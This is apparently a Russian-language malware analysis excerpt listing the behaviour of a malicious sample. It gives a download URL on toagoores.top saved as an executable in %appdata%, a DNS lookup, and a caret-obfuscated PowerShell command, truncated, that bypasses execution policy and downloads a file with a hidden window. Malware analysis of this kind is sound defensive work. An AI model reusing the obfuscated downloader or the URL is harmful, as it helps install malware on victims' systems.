Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^W^ERSHE^Ll^.Ex^e -Ex^eCUTioN^poL^IC^Y^ bY^PAS^s^ -Nop^ro^F^ILE^ ^-windOW^S^Ty^L^E^ hIDDen ^(^N^EW-ObJ^E^Ct^ ^syST^eM^.^n^ET.w^EBCLIeNT).^dOWN^lOA^dF^ILE(^'http://toago...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "Po^W^ERSHE^Ll^.Ex^e -Ex^eCUTioN^poL^IC^Y^ bY^PAS^s^ -Nop^ro^F^ILE^ ^-windOW^S^Ty^L^E^ hIDDen ^(^N^EW-ObJ^E^Ct^ ^syST^eM^.^n^ET.w^EBCLIeNT).^dOWN^lOA^dF^ILE(^'http://toago...' (со скрытым окном)